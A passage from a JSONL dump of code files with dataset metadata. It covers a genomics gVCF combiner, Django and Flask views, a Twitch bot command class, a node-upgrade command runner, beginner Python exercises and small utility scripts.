open(filename)\n line = tempFile.readline()\n except:\n sys.stderr.write(\"[Error] filename \"+filename+\" is invailed.\")\n sys.exit()\n while 1:\n line = tempFile.readline()\n lineNum += 1\n if line:\n data.append([int(line.strip().split('\\t')[0]),int(line.strip().split('\\t')[1])])\n else:\n break\n if lineNum == 0:\n sys.stderr.write(\"[Error] input file is empty.\\n\")\n sys.exit()\n tempFile.close()\n return data\n\ndef statistics(data, filename):\n totalMS = 0\n totalSeqLen = 0\n for i in range(len(data)):\n totalMS += data[i][0]\n totalSeqLen += data[i][1]\n sys.stdout.write(\"Input Filename: %s \\n\"%(filename))\n sys.stdout.write(\"Total time: %.4f (secs) = %.2f (mins) = %.2f (hrs)\\n\"%((totalMS/1000.0), (totalMS/1000.0/60), (totalMS/1000.0/60/60)) )\n sys.stdout.write(\"Total len (nucleotide): %d \\n\"%(totalSeqLen))\n sys.stdout.write(\"Average time (secs):%.4f \\n\"%(totalMS/1000.0/len(data)))\n sys.stdout.write(\"Average len (nucleotide):%d \\n\"%(totalSeqLen/len(data)))\n\ndef main(argv):\n args = parse_stdin_args()\n data = parser(args.i)\n statistics(data, args.i)\n pass\n\nif __name__ == '__main__': main(sys.argv)\n","sub_path":"resultCal.py","file_name":"resultCal.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"274876480","text":"import config\nimport random\nimport requests\nimport json\n\ndef make_url_list(hosts_list, port, uri):\n ret_list = []\n for host, lport in zip(hosts_list, port):\n if lport == '80':\n ret_list.append('http://{}{}'.format(host, uri))\n else:\n ret_list.append('http://{}:{}{}'.format(host, lport, uri))\n ret_list = random.sample(ret_list, len(ret_list))\n return ret_list\n\ndef req_data(req_url, kind):\n ret_vals = requests.get(req_url)\n if kind == 'load':\n text_vals = ret_vals.text \n vals_list = json.loads(text_vals)\n else:\n vals_list = ret_vals\n return vals_list\n \ndef connect_lb(targ_list, err_msg, kind):\n num_targ = len(targ_list)\n for i in range(num_targ):\n try:\n print('try:{}'.format(targ_list[i]))\n vals_list = req_data(targ_list[i], kind)\n return vals_list\n except:\n if i < num_targ:\n continue\n return err_msg\n","sub_path":"dashboard/api_lb.py","file_name":"api_lb.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"187835747","text":"#!/usr/bin/env python3 \r\n# -*- coding: utf-8 -*-\r\n# @Time : 2018/3/12 9:07\r\n# @Author : hyang\r\n# @File : 第一套.py\r\n# @Software: PyCharm\r\n# 第一套题\r\n# 1. 分别解释\"=\",\"==\",\"+=\"的含义(口述)\r\n\"\"\"\r\n答: = 是赋值语句\r\n ==是运算符判断两个对象的值是否相等\r\n +=是进行相加运算后,再赋值比如a+=1 等于a = a+1\r\n\"\"\"\r\n\r\n# 2. 两个变量值的关系?(口述)\r\n# n1 = 123456\r\n# n2 = n1\r\n\"\"\"\r\nn2值=n1值\r\nn2指向n1值的所在地址,即id(n2)=id(n1)\r\n\r\n\"\"\"\r\n# 3. 请写出 “路飞学城” 分别用 utf-8 和 gbk 编码所占的位数(口述)\r\n# utf-8占3个字节, gbk 编码占两个字节\r\n\r\n# 4. 简述Python中的几种数据类型(口述)\r\n\"\"\"\r\n数字型(整型,float),布尔型,字符串,列表,元祖,字典,集合\r\n\"\"\"\r\n# 5. 数据类型的可变与不可变分别有哪些?(口述)\r\n\"\"\"\r\n可变:value变化后,id没有变化(字典,集合,列表)\r\n不可变:value变化后,id变化(数字型(整型,float),布尔型,字符串,元祖)\r\n\"\"\"\r\n\r\n# 6. 元祖,列表,字典有没有长度的限制?(口述)\r\n\"\"\"\r\n没有限制\r\n\"\"\"\r\n\r\n# 7. 列表['alex','egon','yuan','wusir','666'](编程)\r\n# 1.把666替换成999\r\n# 2.获取\"yuan\"索引\r\n# 3.假设不知道前面有几个元素,分片得到最后的三个元素( [-3:] )\r\nli = ['alex','egon','yuan','wusir','666']\r\nli[-1] = '999'\r\nprint(li)\r\nprint(li.index('yuan'))\r\nprint(li[-3:])\r\n\r\n# 8. 将字符串“www.luffycity.com”给拆分成列表:li=['www','luffycity','com'] (编程)\r\ns = \"www.luffycity.com\"\r\nprint(s.split(\",\"))\r\n\r\n# 9. 对字典进行增删改查(编程)\r\n# {\"Development\":\"开发小哥\",\"OP\":\"运维小哥\",\"Operate\":\"运营小仙女\",\"UI\":\"UI小仙\r\n# 女\"}\r\nd = {\"Development\":\"开发小哥\",\"OP\":\"运维小哥\",\"Operate\":\"运营小仙女\",\"UI\":\"UI小仙女\"}\r\nd[\"artist\"]=\"美工\"\r\nd.setdefault(\"saler\",\"销售\")\r\nprint(d)\r\nd.pop(\"saler\")\r\nprint(d)\r\nd[\"artist\"]=\"美工小姐\"\r\nprint(d)\r\nprint(d[\"artist\"])\r\nprint(d.get(\"OP\"))\r\n\r\n# 10. 计算1+2+3...+98+99+100 (编程题)\r\nv_sum = 0\r\nfor i in range(101):\r\n v_sum += i\r\nprint(v_sum)\r\n\r\n# 11. 制作趣味模板程序(编程题)\r\n# 需求:等待用户输入名字、地点、爱好,根据用户的名字和爱好进行任意现实\r\n# 如:敬爱可爱的xxx,最喜欢在xxx地方干xxx\r\n\r\nname = input(\"user:\")\r\naddress = input(\"address:\")\r\nhobby = input(\"hobby:\")\r\ntemplate_str = \"敬爱可爱的{name},最喜欢在{address}地方干{hobby}\"\r\nprint(template_str.format(name=name, address=address, hobby=hobby))\r\n\r\n\r\n# 12. 写一个三次认证(编程)\r\n# 1. 实现用户输入用户名和密码,当用户名为 seven 或 alex 且 密码为 123 时,显示登陆成功,否则登陆失败,失败时允许重复输入三次\r\ncount = 0\r\nwhile count < 3:\r\n user = input(\"user:\")\r\n pwd = input(\"password:\")\r\n if ( user == \"seven\" or user == \"alex\" ) and pwd == \"123\":\r\n print(\"登陆成功\")\r\n break\r\n else:\r\n print(\"登陆失败\")\r\n count += 1\r\nelse:\r\n print(\"重复输入三次错误\")\r\n\r\n","sub_path":"学员作业/第一套.py","file_name":"第一套.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"60300541","text":"from flask import Blueprint, current_app, request, render_template\nfrom ..models import User, Post\n\nmain = Blueprint(\"main\", __name__)\n\n\n@main.route(\"/home\")\n@main.route(\"/\")\ndef index():\n user = User.query.get(1)\n token = user.generate_token(30)\n print(token)\n print(user.check_token(token))\n page = request.args.get(\"page\", 1, type=int)\n posts = Post.query.order_by(Post.created_on.desc()).paginate(per_page=5, page=page)\n return render_template(\"index.html\", posts=posts, title=\"Home\")\n","sub_path":"cblog/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"443591888","text":"\"\"\"A work in progress pipeline to combine (g)VCFs into an alternate format\"\"\"\n\nimport hail as hl\nfrom hail.matrixtable import MatrixTable\nfrom hail.expr import ArrayExpression, StructExpression\nfrom hail.expr.expressions import expr_call, expr_array, expr_int32\nfrom hail.ir.matrix_ir import MatrixKeyRowsBy\nfrom hail.typecheck import typecheck\n\n\ndef transform_one(mt: MatrixTable) -> MatrixTable:\n \"\"\"transforms a gvcf into a form suitable for combining\"\"\"\n mt = mt.annotate_entries(\n # local (alt) allele index into global (alt) alleles\n LA=hl.range(0, hl.len(mt.alleles)),\n END=mt.info.END,\n BaseQRankSum=mt.info['BaseQRankSum'],\n ClippingRankSum=mt.info['ClippingRankSum'],\n MQ=mt.info['MQ'],\n MQRankSum=mt.info['MQRankSum'],\n ReadPosRankSum=mt.info['ReadPosRankSum'],\n )\n mt = mt.annotate_rows(\n info=mt.info.annotate(\n SB_TABLE=hl.array([\n hl.agg.sum(mt.entry.SB[0]),\n hl.agg.sum(mt.entry.SB[1]),\n hl.agg.sum(mt.entry.SB[2]),\n hl.agg.sum(mt.entry.SB[3]),\n ])\n ).select(\n \"MQ_DP\",\n \"QUALapprox\",\n \"RAW_MQ\",\n \"VarDP\",\n \"SB_TABLE\",\n ))\n mt = mt.transmute_entries(\n LGT=mt.GT,\n LAD=mt.AD[0:], # requiredness issues :'(\n LPL=mt.PL[0:],\n LPGT=mt.PGT)\n mt = mt.drop('SB', 'qual', 'filters')\n\n return mt\n\n\ndef merge_alleles(alleles) -> ArrayExpression:\n # alleles is tarray(tarray(tstruct(ref=tstr, alt=tstr)))\n return hl.rbind(hl.array(hl.set(hl.flatten(alleles))),\n lambda arr:\n hl.filter(lambda a: a.alt != '', arr)\n .extend(hl.filter(lambda a: a.alt == '', arr)))\n\n\ndef renumber_entry(entry, old_to_new) -> StructExpression:\n # global index of alternate (non-ref) alleles\n return entry.annotate(LA=entry.LA.map(lambda lak: old_to_new[lak]))\n\n\ndef combine(ts):\n # pylint: disable=protected-access\n tmp = ts.annotate(\n alleles=merge_alleles(ts.data.map(lambda d: d.alleles)),\n rsid=hl.find(hl.is_defined, ts.data.map(lambda d: d.rsid)),\n info=hl.struct(\n MQ_DP=hl.sum(ts.data.map(lambda d: d.info.MQ_DP)),\n QUALapprox=hl.sum(ts.data.map(lambda d: d.info.QUALapprox)),\n RAW_MQ=hl.sum(ts.data.map(lambda d: d.info.RAW_MQ)),\n VarDP=hl.sum(ts.data.map(lambda d: d.info.VarDP)),\n SB_TABLE=hl.array([\n hl.sum(ts.data.map(lambda d: d.info.SB_TABLE[0])),\n hl.sum(ts.data.map(lambda d: d.info.SB_TABLE[1])),\n hl.sum(ts.data.map(lambda d: d.info.SB_TABLE[2])),\n hl.sum(ts.data.map(lambda d: d.info.SB_TABLE[3]))\n ])))\n tmp = tmp.annotate(\n __entries=hl.bind(\n lambda combined_allele_index:\n hl.range(0, hl.len(tmp.data)).flatmap(\n lambda i:\n hl.cond(hl.is_missing(tmp.data[i].__entries),\n hl.range(0, hl.len(tmp.g[i].__cols))\n .map(lambda _: hl.null(tmp.data[i].__entries.dtype.element_type)),\n hl.bind(\n lambda old_to_new: tmp.data[i].__entries.map(lambda e: renumber_entry(e, old_to_new)),\n hl.array([0]).extend(\n hl.range(0, hl.len(tmp.data[i].alleles)).map(\n lambda j: combined_allele_index[tmp.data[i].alleles[j]]))))),\n hl.dict(hl.range(1, hl.len(tmp.alleles) + 1).map(\n lambda j: hl.tuple([tmp.alleles[j - 1], j])))))\n tmp = tmp.annotate_globals(__cols=hl.flatten(tmp.g.map(lambda g: g.__cols)))\n\n return tmp.drop('data', 'g')\n\n\ndef combine_gvcfs(mts):\n \"\"\"merges vcfs using multi way join\"\"\"\n\n # pylint: disable=protected-access\n def localize(mt):\n return mt._localize_entries('__entries', '__cols')\n\n def fix_alleles(alleles):\n return hl.rbind(\n alleles.map(lambda d: d.ref).fold(lambda s, t: hl.cond(hl.len(s) > hl.len(t), s, t), ''),\n lambda ref: hl.rbind(\n alleles.map(lambda a: hl.switch(hl.allele_type(a.ref, a.alt))\n .when('SNP', a.alt + ref[hl.len(a.alt):])\n .when('Insertion', a.alt + ref[hl.len(a.ref):])\n .when('Deletion', a.alt + ref[hl.len(a.ref):])\n .default(a.alt)),\n lambda alts: hl.array([ref]).extend(alts)\n ))\n\n def min_rep(locus, ref, alt):\n return hl.rbind(hl.min_rep(locus, [ref, alt]),\n lambda mr: hl.case()\n .when(alt == '', hl.struct(ref=ref[0:1], alt=alt))\n .when(locus == mr.locus, hl.struct(ref=mr.alleles[0], alt=mr.alleles[1]))\n .or_error(\"locus before and after minrep differ\"))\n\n mts = [hl.MatrixTable(MatrixKeyRowsBy(mt._mir, ['locus'], is_sorted=True)) for mt in mts]\n mts = [mt.annotate_rows(\n # now minrep'ed (ref, alt) allele pairs\n alleles=hl.bind(lambda ref, locus: mt.alleles[1:].map(lambda alt: min_rep(locus, ref, alt)),\n mt.alleles[0], mt.locus)) for mt in mts]\n ts = hl.Table._multi_way_zip_join([localize(mt) for mt in mts], 'data', 'g')\n combined = combine(ts)\n combined = combined.annotate(alleles=fix_alleles(combined.alleles))\n return hl.MatrixTable(\n MatrixKeyRowsBy(\n combined._unlocalize_entries('__entries', '__cols', ['s'])._mir,\n ['locus', 'alleles'],\n is_sorted=True))\n\n\n@typecheck(lgt=expr_call, la=expr_array(expr_int32))\ndef lgt_to_gt(lgt, la):\n \"\"\"A method for transforming Local GT and Local Alleles into the true GT\"\"\"\n return hl.call(la[lgt[0]], la[lgt[1]])\n\n\ndef summarize(mt):\n mt = hl.experimental.densify(mt)\n return mt.annotate_rows(info=hl.rbind(\n hl.agg.call_stats(lgt_to_gt(mt.LGT, mt.LA), mt.alleles),\n lambda gs: hl.struct(\n # here, we alphabetize the INFO fields by GATK convention\n AC=gs.AC,\n AF=gs.AF,\n AN=gs.AN,\n BaseQRankSum=hl.median(hl.agg.collect(mt.entry.BaseQRankSum)),\n ClippingRankSum=hl.median(hl.agg.collect(mt.entry.ClippingRankSum)),\n DP=hl.agg.sum(mt.entry.DP),\n MQ=hl.median(hl.agg.collect(mt.entry.MQ)),\n MQRankSum=hl.median(hl.agg.collect(mt.entry.MQRankSum)),\n MQ_DP=mt.info.MQ_DP,\n QUALapprox=mt.info.QUALapprox,\n RAW_MQ=mt.info.RAW_MQ,\n ReadPosRankSum=hl.median(hl.agg.collect(mt.entry.ReadPosRankSum)),\n SB_TABLE=mt.info.SB_TABLE,\n VarDP=mt.info.VarDP,\n )))\n\ndef finalize(mt):\n return mt.drop('BaseQRankSum', 'ClippingRankSum', 'MQ', 'MQRankSum', 'ReadPosRankSum')\n\n# NOTE: these are just @chrisvittal's notes on how gVCF fields are combined\n# some of it is copied from GenomicsDB's wiki.\n# always missing items include MQ, HaplotypeScore, InbreedingCoeff\n# items that are dropped by CombineGVCFs and so set to missing are MLEAC, MLEAF\n# Notes on info aggregation, The GenomicsDB wiki says the following:\n# The following operations are supported:\n# \"sum\" sum over valid inputs\n# \"mean\"\n# \"median\"\n# \"element_wise_sum\"\n# \"concatenate\"\n# \"move_to_FORMAT\"\n# \"combine_histogram\"\n#\n# Operations for the fields\n# QUAL: set to missing\n# INFO {\n# BaseQRankSum: median, # NOTE : move to format for combine\n# ClippingRankSum: median, # NOTE : move to format for combine\n# DP: sum\n# ExcessHet: median, # NOTE : this can also be dropped\n# MQ: median, # NOTE : move to format for combine\n# MQ_DP: sum,\n# MQ0: median,\n# MQRankSum: median, # NOTE : move to format for combine\n# QUALApprox: sum,\n# RAW_MQ: sum\n# ReadPosRankSum: median, # NOTE : move to format for combine\n# SB_TABLE: elementwise sum, # NOTE: after being moved from FORMAT as SB\n# VarDP: sum\n# }\n# FORMAT {\n# END: move from INFO\n# }\n#\n# The following are Truncated INFO fields for the specific VCFs this tool targets\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n# ##INFO=\n#\n# As of 2/15/19, the schema returned by the combiner is as follows:\n# ----------------------------------------\n# Global fields:\n# None\n# ----------------------------------------\n# Column fields:\n# 's': str\n# ----------------------------------------\n# Row fields:\n# 'locus': locus\n# 'alleles': array\n# 'rsid': str\n# 'info': struct {\n# MQ_DP: int32,\n# QUALapprox: int32,\n# RAW_MQ: float64,\n# VarDP: int32,\n# SB_TABLE: array\n# }\n# ----------------------------------------\n# Entry fields:\n# 'LAD': array\n# 'DP': int32\n# 'GQ': int32\n# 'LGT': call\n# 'MIN_DP': int32\n# 'LPGT': call\n# 'PID': str\n# 'LPL': array\n# 'LA': array\n# 'END': int32\n# 'BaseQRankSum': float64\n# 'ClippingRankSum': float64\n# 'MQ': float64\n# 'MQRankSum': float64\n# 'ReadPosRankSum': float64\n# ----------------------------------------\n# Column key: ['s']\n# Row key: ['locus', 'alleles']\n# ----------------------------------------\n","sub_path":"hail/python/hail/experimental/vcf_combiner.py","file_name":"vcf_combiner.py","file_ext":"py","file_size_in_byte":9942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"53900531","text":"import sys\nimport psycopg2 as psycopg2\nimport os\n\ndef connect_to_server():\n return psycopg2.connect(dbname=os.environ.get('DB_NAME'),\n host=os.environ.get('DB_HOST'),\n port=os.environ.get('DB_PORT'),\n user=os.environ.get('DB_USER'),\n password=os.environ.get('DB_PASSWORD')\n )\n\n# Connect to DB\nconn = connect_to_server()\n\n# Create a cursor\ncur = conn.cursor()\n\n# Execute queries\nif (sys.argv):\n\tTZ = sys.argv[1]\n\tcur.execute(\"set role to dude; select dude.daily_update_reruns_f(timezone=>%s) as job_run_code;\",(TZ,))\nelse:\n\tcur.execute(\"set role to dude; select dude.daily_update_reruns_f() as job_run_code;\")\n\n# Fetch Results\nresults = cur.fetchall()\n\n# Save results to a file\nif not(results[0][0] is None):\n\twith open('dude-rerun-jobs.sh', 'w') as f:\n\t\tfor item in results:\n\t\t\tf.write(\"%s\\n\" % item)\n\tf.close()\n\n# Close connection to DB\nconn.close()\n","sub_path":"dude-reruns.py","file_name":"dude-reruns.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"531873849","text":"import asyncio\nimport inspect\n\nclass Command:\n \"\"\" A command class to provide methods we can use with it \"\"\"\n\n def __init__(self, bot, comm, desc='', alias=[], admin=False, unprefixed=False, listed=True):\n self.comm = comm\n self.desc = desc\n self.alias = alias\n self.admin = admin\n self.listed = listed\n self.unprefixed = unprefixed\n self.subcommands = {}\n self.bot = bot\n bot.commands[comm] = self\n for a in self.alias:\n bot.commands[a] = self\n\n def subcommand(self, *args, **kwargs):\n \"\"\" Create subcommands \"\"\"\n return SubCommand(self, *args, **kwargs)\n\n def __call__(self, func):\n \"\"\" Make it able to be a decorator \"\"\"\n\n self.func = func\n\n return self\n\n @asyncio.coroutine\n def run(self, message):\n \"\"\" Does type checking for command arguments \"\"\"\n args = message.content[len(self.bot.prefix):].split(\" \")[1:]\n\n args_name = inspect.getfullargspec(self.func)[0][1:]\n\n if len(args) > len(args_name):\n args[len(args_name)-1] = \" \".join(args[len(args_name)-1:])\n\n args = args[:len(args_name)]\n\n ann = self.func.__annotations__\n\n for x in range(0, len(args_name)):\n try:\n v = args[x]\n k = args_name[x]\n\n if not type(v) == ann[k]:\n try:\n v = ann[k](v)\n\n except Exception:\n raise TypeError(\"Invalid type: got {}, {} expected\"\n .format(ann[k].__name__, v.__name__))\n\n args[x] = v\n except IndexError:\n break\n\n if len(list(self.subcommands.keys())) > 0:\n try:\n subcomm = args.pop(0).split(\" \")[0]\n except Exception:\n yield from self.func(message, *args)\n return\n if subcomm in self.subcommands.keys():\n c = message.content.split(\" \")\n c.pop(1)\n message.content = \" \".join(c)\n yield from self.subcommands[subcomm].run(message)\n\n else:\n yield from self.func(message, *args)\n\n else:\n try:\n yield from self.func(message, *args)\n except TypeError as e:\n if len(args) < len(args_name):\n raise Exception(\"Not enough arguments for {}, required arguments: {}\"\n .format(self.comm, \", \".join(args_name)))\n else:\n raise e\n\nclass SubCommand(Command):\n \"\"\" Subcommand class \"\"\"\n\n def __init__(self, parent, comm, desc, *alias):\n self.comm = comm\n self.parent = parent\n self.subcommands = {}\n parent.subcommands[comm] = self\n for a in alias:\n parent.subcommands[a] = self\n","sub_path":"asynctwitch/dataclasses.py","file_name":"dataclasses.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"140364726","text":"import logging\nfrom django.shortcuts import get_object_or_404, get_list_or_404, render\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.template import loader\nfrom django.utils import timezone\n\nfrom ..models import *\nfrom ..forms import MarkingForm\n\nfrom .helper import get_next_exercise_number\n\nfrom datetime import datetime, time, timedelta\n\nlogger = logging.getLogger('django')\n\n\ndef index(request):\n return render(request, 'kateapp/home.html')\n\ndef grading_scheme(request):\n return render(request, 'kateapp/grading_scheme.html')\n\ndef course_list(request, letter_yr):\n courses_term1 = list(Courses.objects.filter(courses_classes__letter_yr=letter_yr, courses_term__term=1).order_by('code'))\n courses_term2 = list(Courses.objects.filter(courses_classes__letter_yr=letter_yr, courses_term__term=2).order_by('code'))\n courses_term3 = list(Courses.objects.filter(courses_classes__letter_yr=letter_yr, courses_term__term=3).order_by('code'))\n context = {\n 'letter_yr': letter_yr,\n 'courses_term1': courses_term1,\n 'courses_term2': courses_term2,\n 'courses_term3': courses_term3,\n }\n return render(request, 'kateapp/course_list.html', context)\n\n\ndef course(request, code):\n course = get_object_or_404(Courses, pk=str(code))\n terms = get_list_or_404(Term, courses_term__code=str(code))\n terms.sort(key=lambda x: x.term)\n login = request.user.get_username()\n person = get_object_or_404(People, login=login)\n teacher = person.tutor == None\n exercises = Exercises.objects.filter(code=str(code))\n next_number = get_next_exercise_number(exercises)\n exercises_resources = []\n for exercise in list(exercises):\n resources = list(Resource.objects.filter(\n exercises_resource__exercise__code=exercise.code, exercises_resource__exercise__number=exercise.number))\n exercises_resources.append((exercise, resources))\n note = list(Courses_Resource.objects.filter(code=code, course_resource_type='NOTE').order_by('release_date'))\n exercise = list(Courses_Resource.objects.filter(code=code, course_resource_type='PROBLEM').order_by('release_date'))\n url = list(Courses_Resource.objects.filter(code=code, course_resource_type='URL').order_by('release_date'))\n panopto = list(Courses_Resource.objects.filter(code=code, course_resource_type='PANOPTO').order_by('release_date'))\n piazza = list(Courses_Resource.objects.filter(code=code, course_resource_type='PIAZZA').order_by('release_date'))\n homepage = list(Courses_Resource.objects.filter(code=code, course_resource_type='HOMEPAGE').order_by('release_date'))\n resource = (note, exercise, url, panopto, piazza, homepage)\n context = {\n 'course': course,\n 'terms': terms,\n 'teacher': teacher,\n 'exercises_resources': exercises_resources,\n 'next_number': next_number,\n 'NO': Exercises.NO,\n 'resource': resource,\n 'empty': (resource == ([], [], [], [], [], [])),\n }\n return render(request, 'kateapp/course.html', context)\n","sub_path":"KATE/kateapp/views/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"545764137","text":"from nodeupgrade.log import UpgradeLog\nlogger = UpgradeLog()\n\n\nclass Activity:\n\n def __init__(self, **kwargs):\n\n self.check = True\n keychain = ('command', 'node', 'expect', 'method', 'lineno', 'activity', 'instruction', 'result')\n for key in keychain:\n if key in kwargs.keys():\n pass\n else:\n kwargs[key] = ''\n self.check = False\n self.command = str(kwargs['command'])\n self.node = str(kwargs['node'])\n self.expect = str(kwargs['expect'])\n self.method = str(kwargs['method'])\n self.lineno = str(kwargs['lineno'])\n self.activity = str(kwargs['activity'])\n self.instruction = str(kwargs['instruction'])\n self.result = str(kwargs['result'])\n self.output = ''\n\n def show(self):\n logger.info('Line number:\\t' + self.lineno)\n logger.info('Activity:\\t' + self.activity)\n logger.info('Node:\\t' + self.node)\n logger.info('Instruction:\\t' + self.instruction)\n logger.info('Result:\\t' + self.result)\n\n def execute(self, nodelist):\n\n self.show()\n if self.method == 'manual':\n return self.manual()\n else:\n flag = nodelist[self.node].execute(self.command)\n self.output = nodelist[self.node].output\n self.expect.encode(\"utf-8\")\n if flag:\n if self.method == 'pas':\n return self.pas()\n if self.method == 'regex':\n return self.regex()\n if self.method == 'onaji':\n return self.onaji()\n else:\n logger.info('Command execute failed', '\\033[1;31;40m')\n return False\n\n def manual(self):\n logger.info('Activity: ' + self.activity + ' Need human intervention', '\\033[1;33;40m')\n return False\n\n def pas(self):\n logger.info('Activity: ' + self.activity + ' Nothing to check', '\\033[1;32;40m')\n return True\n\n def regex(self):\n if self.output.find(self.expect) != -1:\n logger.info('Activity: ' + self.activity + ' ... successful', '\\033[1;32;40m')\n return True\n else:\n logger.info('Result verification failed', '\\033[1;31;40m')\n logger.info('Expect: ' + self.expect)\n logger.info('Got: ' + self.output)\n return False\n\n def onaji(self):\n if self.output == self.expect:\n logger.info('Activity: ' + self.activity + ' ... successful', '\\033[1;32;40m')\n return True\n else:\n logger.info('Result verification failed', '\\033[1;31;40m')\n logger.info('Expect: ' + self.expect)\n logger.info('Got: ' + self.output)\n return False\n\n\n\n","sub_path":"nodeupgrade/activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":2803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"443784443","text":"\nimport time\n\nimport numpy as np\nimport pandas as pd\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nplt.style.use(['seaborn', 'ggplot', 'seaborn-white'])\n\nimport scipy\nfrom scipy import stats\nfrom scipy.io import arff\n\nfrom itertools import cycle, islice, combinations_with_replacement, product\n\nimport sklearn\n\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder, StandardScaler, MinMaxScaler, RobustScaler\n\nfrom sklearn.model_selection import train_test_split, cross_val_score, KFold, StratifiedKFold\n\nfrom sklearn.metrics import r2_score, mean_squared_error\nfrom sklearn.metrics import confusion_matrix, classification_report, accuracy_score\n\n# regressors\nfrom sklearn.linear_model import LinearRegression as lr, SGDRegressor as sgdr, ElasticNet as enr\nfrom sklearn.linear_model import Ridge as rr, RidgeCV as rcvr, Lasso as lassor, LassoCV as lassocvr\nfrom sklearn.neighbors import KNeighborsRegressor as knnr\nfrom sklearn.tree import DecisionTreeRegressor as dtr\nfrom sklearn.svm import SVR as svr\nfrom sklearn.ensemble import RandomForestRegressor as rfr, AdaBoostRegressor as abr, GradientBoostingRegressor as gbr\n\n# classifiers\nfrom sklearn.linear_model import SGDClassifier as sgdc, LogisticRegression as logitc, RidgeClassifier as rc\nfrom sklearn.neighbors import KNeighborsClassifier as knnc, NearestCentroid as ncc, RadiusNeighborsClassifier as rnc\nfrom sklearn.tree import DecisionTreeClassifier as dtc\nfrom sklearn.svm import SVC as svc\nfrom sklearn.naive_bayes import GaussianNB as gnbc, BernoulliNB as bnbc, MultinomialNB as mnbc\nfrom sklearn.ensemble import RandomForestClassifier as rfc, GradientBoostingClassifier as gbc\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as ldac\n\n# clustering\nfrom sklearn.metrics import silhouette_score\nfrom sklearn.neighbors import kneighbors_graph\nfrom sklearn.cluster import estimate_bandwidth\nfrom sklearn.cluster import KMeans as kmg, MeanShift as msg, MiniBatchKMeans as mbg\nfrom sklearn.cluster import AgglomerativeClustering as acg, SpectralClustering as scg, AffinityPropagation as apg\nfrom sklearn.cluster import DBSCAN as dbg, OPTICS as optg, Birch as big\nfrom sklearn.mixture import GaussianMixture as gmg\n\n\n# multiclass\nfrom sklearn.multiclass import OneVsRestClassifier as ovrc, OneVsOneClassifier as ovoc\n\n# redux\nfrom sklearn.decomposition import PCA\nfrom sklearn.feature_selection import SelectKBest, chi2\n\n# pipeline and optimization\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\n\n\n\nclass rubia_models:\n\n\n def __init__(self, df, width=100, debug=False):\n self.data_raw = df\n self.M = df\n self.report_width = width\n self.graph_width = 1.3 * width // 10\n self.graphs_expl = []\n self.graphs_model = []\n self.debug = debug\n if not self.debug: # remove warnings when not running in debug mode\n import warnings\n warnings.filterwarnings(\"ignore\")\n \n \n # check columns dtype\n def checkDtypes(self, df):\n cols_resume = []\n for col in df.columns:\n coltype = str(df[col].dtype)\n cols_resume.append('%s (%s)' % (col, coltype))\n # beware in the presence of non numeric categorical data\n return cols_resume\n\n \n # show a few general info about the dataset\n def describe(self, df, printt=True):\n self.cols_dtypes = self.checkDtypes(df)\n if printt:\n print(self.report_width * '*', '\\n*')\n print('* DATA OVERVIEW FOR THIS DATASET \\n*')\n print('* DATA SHAPE: ', df.shape)\n print('* COLUMNS INFO: ', ', '.join(self.cols_dtypes))\n print('* ')\n print(self.report_width * '*')\n print('\\nDATA SAMPLE: ')\n print(df.sample(5))\n print('\\nSTATISTICS: ')\n print(df.describe(include='all').T)\n print('\\n\\n')\n return None\n \n\n # run a basic and repetitive EDA for a given pandas dataframe and remove constant columns\n def explore(self, df, y_cols, ig_cols, printt=True, graph=False):\n X_cols = [col for col in df.columns if col not in y_cols and col not in ig_cols]\n self.X = df.loc[:, X_cols]\n self.y = df.loc[:, y_cols]\n for col in self.X.columns:\n if len(self.X[col].unique()) == 1: \n self.X.drop(col, axis=1, inplace=True)\n print('Column removed (constant value):', col)\n for col in self.y.columns:\n if len(self.y[col].unique()) == 1: \n self.y.drop(col, axis=1, inplace=True)\n print('Column removed (constant value):', col)\n self.M = pd.concat([self.X, self.y], axis=1)\n\n if printt:\n print(self.report_width * '*', '\\n*')\n print('* FEATURE EXTRACTION REPORT \\n*')\n print('* X: ', ' | '.join(X_cols))\n print('* y: ', ' | '.join(y_cols))\n print('* M: ', self.X.shape, '|', self.y.shape)\n print('* ')\n print(self.report_width * '*' + '\\n')\n\n if graph: \n self.graphs_expl = [] \n size = self.graph_width\n # balance between every output class: pay special attention with unbalanced data\n unique = []\n for y_col in y_cols:\n unique += list(df[y_col].unique())\n if len(df[y_col].unique()) <= 10:\n fig, ax = plt.subplots(figsize=(size, 0.5 * size))\n df[y_col].value_counts().nlargest(10).plot(kind='bar')\n plt.title('Classes Balance (%s)' % y_col)\n plt.xticks(rotation=45)\n self.graphs_expl.append(fig)\n plt.show()\n # histogram for every feature: pay attention to outliers, data distribution and dimension\n if df.shape[1] <= 20: # for larger datasets, graphs are not recommended\n dfg = df.copy()\n if len(dfg) > 1000: dfg = dfg.sample(1000)\n COLS = 3\n ROWS = len(dfg.columns) // COLS + (1 if len(dfg.columns) % COLS != 0 else 